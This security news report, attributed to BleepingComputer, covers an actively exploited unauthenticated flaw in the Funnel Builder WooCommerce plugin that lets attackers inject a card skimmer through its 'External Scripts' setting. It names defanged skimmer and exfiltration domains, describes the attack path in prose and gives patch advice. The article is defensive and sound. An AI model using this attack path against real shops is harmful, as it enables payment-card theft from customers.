Funnel Builder WordPress Plugin Vulnerability
A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript snippets into WooCommerce checkout pages. The flaw, which has not received an official identifier, can be leveraged without authentication and affects all versions of the plugin before 3.15.0.3.
Funnel Builder is a WordPress plugin for WooCommerce Checkout developed by FunnelKit, primarily used to customize checkout pages, with features like one-click upsells, landing pages, and to optimize conversion rates. Based on statistics from WordPress.org, the Funnel Builder plugin is active on more than 40,000 websites.
Exploitation and Malicious Activity
E-commerce security company Sansec detected the malicious activity and noticed that the payload (analytics-reports[.]com/wss/jquery-lib.js) is disguised as a fake Google Tag Manager/Google Analytics script that opens a WebSocket connection to an external location (wss://protect-wss[.]com/ws). An attacker can exploit it to modify the plugin’s global settings via an unprotected, publicly exposed checkout endpoint.
This allows them to inject arbitrary JavaScript into the plugin’s “External Scripts” setting, causing malicious code to execute on every checkout page. According to Sansec, the attacker-controlled server delivers a customized payment card skimmer that steals the following information: credit card numbers, CVVs, billing addresses, and other customer information.
Impact and Consequences
Payment card skimmers enable threat actors to make fraudulent online purchases, while stolen records often end up sold individually or in bulk on dark web portals known as carding markets. The exploitation of this vulnerability can have severe consequences for website owners and their customers, highlighting the importance of keeping plugins up to date and monitoring for suspicious activity.
Vendor Response and Recommendations
FunnelKit addressed the vulnerability in version 3.15.0.3 of Funnel Builder, released on May 14, 2026. A security advisory from the vendor, seen by Sansec, confirms the malicious activity, saying “we identified an issue that allowed bad actors to inject scripts.” The vendor recommends that website owners and administrators prioritize updating to the latest version from the WordPress dashboard and also review Settings > Checkout > External Scripts for potential rogue scripts the attacker may have added.
It is essential for website owners and administrators to take immediate action to protect their customers and prevent further exploitation. By updating to the latest version of the Funnel Builder plugin and monitoring for suspicious activity, they can help prevent the theft of sensitive customer information and reduce the risk of fraudulent online purchases.
Prevention and Best Practices
To prevent similar vulnerabilities from being exploited in the future, website owners and administrators should prioritize keeping their plugins and themes up to date, monitoring for suspicious activity, and implementing robust security measures. This includes using strong passwords, enabling two-factor authentication, and regularly reviewing settings and configurations for potential vulnerabilities.
By taking these steps, website owners and administrators can help protect their customers and prevent the exploitation of vulnerabilities like the one found in the Funnel Builder plugin. It is crucial to stay vigilant and proactive in maintaining the security and integrity of online platforms, especially those that handle sensitive customer information.
Source: BleepingComputer